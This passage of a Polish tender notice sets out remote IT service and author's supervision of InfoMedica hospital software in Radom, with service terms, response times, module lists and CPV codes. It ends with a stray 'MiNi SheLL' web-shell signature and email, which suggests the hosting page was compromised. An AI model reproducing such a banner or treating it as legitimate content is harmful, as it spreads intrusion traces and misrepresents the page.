e.	Doradztwo w zakresie przygotowywania danych przekazywanych przez Zamawiającego do jednostek nadrzędnych i współpracujących (np. do Narodowego Funduszu Zdrowia, Wydziału Zdrowia odpowiedniego Urzędu, banków itp.) w formie elektronicznej (np. dyskietki, łącza telekomunikacyjne, itp.);
f.	Konsultacje uzupełniające, pomoc użytkownikom w obsłudze oprogramowani aplikacyjnego (konsultacje i szkolenia mogą być prowadzone zdalnie na wskazanych stacjach użytkowników i przy pomocy telefonu;
g.	Doradztwo i pomoc przy administrowaniu bazą danych Oracle;
h.	Bieżące optymalizowanie konfiguracji oprogramowania uwzględniające potrzeby Zamawiającego;
i.	Pomoc w awaryjnym odtwarzaniu na wniosek Zamawiającego stanu oprogramowania i zgromadzonych  danych archiwalnych, poprawnie zabezpieczonych na odpowiednich nośnikach;
j.	Doradztwo w zakresie rozbudowy środków informatycznych;
k.	Pomoc w usunięciu awarii oprogramowania objętego niniejszą umową, powstałej z winy Zamawiającego lub wskutek wypadków losowych;
l.	Weryfikacja integralności baz danych;
m.	Dokonywanie ponownych instalacji oprogramowania w przypadkach rozbudowy infrastruktury informatycznej Zamawiającego;
n.	Korzystanie z konsultacji telefonicznych (Hot-Line);
o.	Prowadzenie rejestru kontaktów z Zamawiającym obejmującego wykonanie czynności w tym zmiany konfiguracji oprogramowania.
2.	Serwis ma być świadczony zdalnie za pomocą łączy. W przypadku braku możliwości wykonania usług serwisowych ta drogą, mają być one realizowane w siedzibie zamawiającego po dokładnej analizie każdego zgłoszenia.
3.	Wizyty serwisowe wymagające interwencji w siedzibie Zamawiającego muszą odbyć się w ciągu 48 godzin od momentu pisemnego potwierdzenia przyjęcia zgłoszenia.
4.	Świadczenie usług serwisowych w godzinach od 8.00 do 16.00 od poniedziałku do piątku z wyjątkiem dni ustawowo wolnych od pracy. Czas reakcji serwisu na pisemne zgłoszenia 48 godzin.
5.	W ciągu całego czasu trwania umowy nie istnieją ograniczenia: ilości wizyt serwisowych, liczby konsultacji telefonicznych (hot-line), liczby zdalnych sesji za pomocą łączy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.10.00-2, 72.26.30.00-6, 72.26.50.00-0, 72.26.70.00-4, 72.26.71.00-0, 48.61.00.00-7, 48.61.10.00-4, 48.61.40.00-5, 48.81.20.00-3, 48.81.40.00-7, 48.81.41.00-8, 48.81.42.00-9, 48.81.45.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nadzór autorski Oprogramowania Aplikacyjnego InfoMedica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór autorski Oprogramowania Aplikacyjnego InfoMedica  zainstalowanego w Radomskim Szpitalu Specjalistycznym i zawierającego moduły:

Oprogramowanie aplikacyjne Infomedica
Nazwa modułu	Ilość użytkowników	Termin rozpoczęcia
Finansowo - Księgowy	9	Od daty zawarcia umowy
Rachunek Kosztów	2	
Rejestr Sprzedaży	2	
Wycena Kosztów Normatywnych	2	
Gospodarka Materiałowa	4	
Środki Trwałe	1	
Wyposażenie	1	
Ruch Chorych	Otwarta	
Apteka	Otwarta	
Apteczka Oddziałowa	Otwarta	
Kadry	6	
Ewidencja Czasu Pracy	Otwarta	
Płace	8	
Zlecenia	24	

Płatność w ratach miesięcznych.

Zobowiązania Wykonawcy :
W ramach nadzoru autorskiego Wykonawca winien zapewnić:
a.	udostępnienie poprawek do Oprogramowania Aplikacyjnego, w przypadku stwierdzenia przez Zamawiającego błędu Oprogramowania Aplikacyjnego (tzn. nie spowodowanego przez Zamawiającego powtarzalnego działania Oprogramowania Aplikacyjnego, w tym samym miejscu programu, prowadzącego w każdym przypadku do otrzymania błędnych wyników jego działania) :
w przypadku Błędu krytycznego:
1.	czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego Błędu krytycznego lub zmiany kwalifikacji błędu) wynosi 1 dzień roboczy;
2.	czas dokonania i udostępnienia Zamawiającemu odpowiednich korekt Oprogramowania Aplikacyjnego wyniesie do 3 dni roboczych, od chwili rozpoczęcia czynności serwisowych 
3.	w przypadku wystąpienia Błędu krytycznego Wykonawca może wprowadzić tzw. rozwiązanie tymczasowe, doraźnie rozwiązujące problem Błędu krytycznego; w takim przypadku dalsza obsługa usunięcia dotychczasowego Błędu krytycznego będzie traktowana jako błąd zwykły;
4.	Zamawiający udostępni Wykonawcy zdalny dostęp do baz danych i Oprogramowania Aplikacyjnego,  na zasadach określonych w załączniku do SIWZ. 
w pozostałych przypadkach:
1.	czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego Błędu lub zmiany kwalifikacji błędu) wynosi do 15 dni roboczych;
2.	czas dokonania i udostępnienia Zamawiającemu odpowiednich korekt Oprogramowania Aplikacyjnego wyniesie do 60 dni roboczych od chwili wpłynięcia zgłoszenia;
b.	w wyjątkowych wypadkach, za zgodą Zamawiającego, czas dokonania korekt będzie uzgodniony pomiędzy Wykonawcą i Zamawiającym; 
c.	zgłoszenie błędu przez Zamawiającego odbywać się będzie :
- poprzez witrynę internetową Help-Desku Wykonawcy
- telefonicznie pod numerem telefonu:
(1)	 - serwis InfoMedica część biała (medyczna )
(2)	- serwis InfoMedica część szara (administracyjna)
- pisemnie na formularzu przesyłanym za pomocą poczty elektronicznej na adres 
   , 
- opcjonalnie faksem na numer ;
W przypadku, gdy formularz zgłoszenia błędu zostanie przyjęty przez Wykonawcę:
(a)	w godzinach pomiędzy 16.00 a 24.00 dnia roboczego - traktowany będzie jak przyjęty o godz. 8.00 następnego dnia roboczego;
(b)	w godzinach pomiędzy 0.00 a 8.00 dnia roboczego - traktowany będzie jako przyjęty o godz. 8.00 danego dnia roboczego;
(c)	w dniu ustawowo lub dodatkowo wolnym od pracy - traktowany będzie jako przyjęty o godz. 8.00 najbliższego dnia roboczego; 
d.	rozwój Oprogramowania Aplikacyjnego objętego niniejszą Umową zgodnie ze zmieniającymi się powszechnie obowiązującymi przepisami prawa lub przepisami prawa wewnętrznie obowiązującymi wydanymi na podstawie delegacji ustawowej, z zastrzeżeniem, że Wykonawca zobowiązany jest do:
1.	przekazania Zamawiającemu informacji o nowych wersjach Oprogramowania Aplikacyjnego, ukazujących się średnio cztery (4) razy w roku, odbywać się będzie poprzez wysłanie pocztą elektroniczną na adres e-mail Zamawiającego;
2.	udostępniania uaktualnień Oprogramowania Aplikacyjnego (nowych wersji Oprogramowania Aplikacyjnego) poprzez serwer ftp: , przy czym na pisemne życzenie Zamawiającego, Wykonawca zobowiązuje się przygotować i wysłać na adres Zamawiającego nośnik CD-ROM zawierający nową wersję Oprogramowanie Aplikacyjnego;
3.	w ramach umowy Wykonawca zapewnia bezpłatną wymianę licencji na system informatyczny nowej generacji (dotyczy modułów w części medycznej).
e.	możliwość pisemnego zgłoszenia uwag i propozycji modyfikacji Oprogramowania Aplikacyjnego, wynikająca z zobowiązania Wykonawcy do dokonywania rozwoju Oprogramowania Aplikacyjnego; 
f.	gotowość przyjmowania i rozpatrywania indywidualnych żądań zmian (tj. modyfikacji płatnych) Oprogramowania Aplikacyjnego objętego niniejszą Umową. Zasady realizacji zgłoszonych żądań będą każdorazowo uzgadniane pomiędzy Wykonawcą i Zamawiającym.
g.	Korzystanie z usługi Hot-Line Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.00.00-5, 72.26.20.00-9, 72.26.72.00-1, 72.26.80.00-1, 48.61.00.00-7, 48.61.10.00-4, 48.61.40.00-5, 48.81.20.00-3, 48.81.40.00-7, 48.81.41.00-8, 48.81.42.00-9, 48.81.45.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com